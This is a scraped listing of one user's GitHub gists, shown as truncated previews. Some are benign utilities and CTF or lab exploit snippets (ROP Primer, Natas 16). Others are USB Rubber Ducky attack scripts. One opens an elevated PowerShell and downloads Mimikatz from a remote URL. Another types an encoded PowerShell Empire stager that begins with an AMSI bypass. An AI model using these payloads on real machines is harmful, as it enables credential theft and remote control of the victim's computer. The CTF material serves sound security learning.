Baptiste MOINE Creased

Check all my projects on GitLab ~ https://git.bmoine.fr ~ Learning is Endless!

Creased / xivo_provd_check.py

Last active April 24, 2017 13:15

Xivo provd check

Creased / description.html

Last active May 18, 2017 09:23

GitLab de Baptiste MOINE

	<div style="display: block; text-align: center; margin: 0 auto;" id="description">
	<a href="https://www.bmoine.fr/" title="Parcours de professionnalisation - Baptiste MOINE" target="_blank">
	<img height="180px" src="https://www.bmoine.fr/assets/images/icon.svg" alt="Logo de Baptiste MOINE">
	</a>
	<p>Bienvenue sur l'instance GitLab de <a href="http://www.bmoine.fr" title="Baptiste MOINE">Baptiste MOINE</a>.</p>
	<p>Sur cette instance, vous trouverez des projets open source sur lesquels je travaille.</p>
	<p>Certains projets peuvent ne pas apparaître sur cette instance, mais vous pouvez trouver l'ensemble de mes projets sur <a title="Suivez mes projets opensource sur GitHub" href="https://github.com/Creased">GitHub</a>, <a title="Suivez mes projets opensource sur GitLab" href="https://gitlab.com/Creased">GitLab</a>, <a title="Suivez mes projets opensource sur Docker Hub" href="https://hub.docker.com/r/creased/">Docker Hub</a>, <a title="Suivez mes projets opensource sur IBM Bluemix" hre

Creased / wol.py

Created July 7, 2017 13:50

WoL

	#!/usr/bin/env python
	# --coding:Utf-8 -

	# Magic Packet

	import logging
	logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
	from scapy.all import *

	conf.iface='eth1'

Creased / level0.sh

Last active July 23, 2017 01:28

ROP Primer - https://www.vulnhub.com/entry/rop-primer-02,114/

	ssh [email protected] # warmup

	export TMP=$(mktemp -d)

	PATTERN=$(gdb -q -ex 'pattc 250' -ex 'q' \| awk -F"'" '{print $2}')
	echo "${PATTERN}\n" >${TMP}/inp
	OFFSET=$(gdb -q ./level0 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' \| grep -Eo "found at offset: [0-9]+" \| awk -F': ' '{print $2}')
	VDSO=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'vmmap vdso' -ex 'q' \| tail -n1 \| awk '{print $1}' \| grep -Eo '0x[A-Fa-f0-9]+' \| sed -r 's/(0x)0/\1/')
	MPROTECT=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p mprotect' -ex 'q' \| tail -n1 \| grep -Eo '0x[A-Fa-f0-9]+')
	READ=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p read' -ex 'q' \| tail -n1 \| grep -Eo '0x[A-Fa-f0-9]+')

Creased / mimikatz.duck

Last active August 7, 2017 19:44

Mimikatz Rubber Ducky script

	GUI r
	DELAY 500
	STRING powershell.exe Start-Process powershell.exe -Verb RunAs
	ENTER
	DELAY 1500
	STRING $Payload = Get-Random
	ENTER
	STRING Start-BitsTransfer -Source https://go.bmoine.fr/mk -Destination C:\$Payload.exe
	ENTER
	DELAY 1500

Creased / lockscreen.duck

Created August 6, 2017 16:49

Windows Lockscreen prompt Rubber Ducky script

GUI l

Creased / empire.duck

Created August 17, 2017 03:25

Empire Rubber Ducky script

	DELAY 1500
	GUI r
	DELAY 500
	STRING powershell.exe Start-Process powershell.exe -Verb RunAs
	ENTER
	DELAY 1500
	STRING powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5
	STRING AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACc
	STRING AKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZA
	STRING AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsA

Creased / generate_ldap_sambasid.sh

Last active October 24, 2017 09:04

LDAP sambaSID

	#!/bin/bash

	# Usage: ./generate_ldap_sambasid.sh >samba_sid.ldif
	# ldapmodify -x -D "cn=admin,dc=domain,dc=tld" -W -f samba_sid.ldif

	# Get SID from: net getdomainsid
	SID="S-1-5-21-blahblahblah-blahblahblah-blahblahblah"
	DOMAIN="dc=domain,dc=tld"
	USERS_OU="Peoples"
	GROUPS_OU="Groups"

Creased / extractGifs.py

Created November 23, 2017 14:33 — forked from revolunet/extractGifs.py

extract frames from animated gif using python+PIL

	import os
	from PIL import Image


	def extractFrames(inGif, outFolder):
	frame = Image.open(inGif)
	nframes = 0
	while frame:
	frame.save( '%s/%s-%s.gif' % (outFolder, os.path.basename(inGif), nframes ) , 'GIF')
	nframes += 1

Creased / exploit.py

Last active December 4, 2017 21:37

Natas 16

	import requests
	import re
	import sys

	# HTTP headers
	headers={
	'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
	'Accept-Language': 'en'
	}

	ssh [email protected] # warmup

	export TMP=$(mktemp -d)

	PATTERN=$(gdb -q -ex 'pattc 250' -ex 'q' \| awk -F"'" '{print $2}')
	echo "${PATTERN}\n" >${TMP}/inp
	OFFSET=$(gdb -q ./level0 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' \| grep -Eo "found at offset: [0-9]+" \| awk -F': ' '{print $2}')
	VDSO=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'vmmap vdso' -ex 'q' \| tail -n1 \| awk '{print $1}' \| grep -Eo '0x[A-Fa-f0-9]+' \| sed -r 's/(0x)0/\1/')
	MPROTECT=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p mprotect' -ex 'q' \| tail -n1 \| grep -Eo '0x[A-Fa-f0-9]+')
	READ=$(gdb -q ./level0 -ex 'b main' -ex 'r' -ex 'p read' -ex 'q' \| tail -n1 \| grep -Eo '0x[A-Fa-f0-9]+')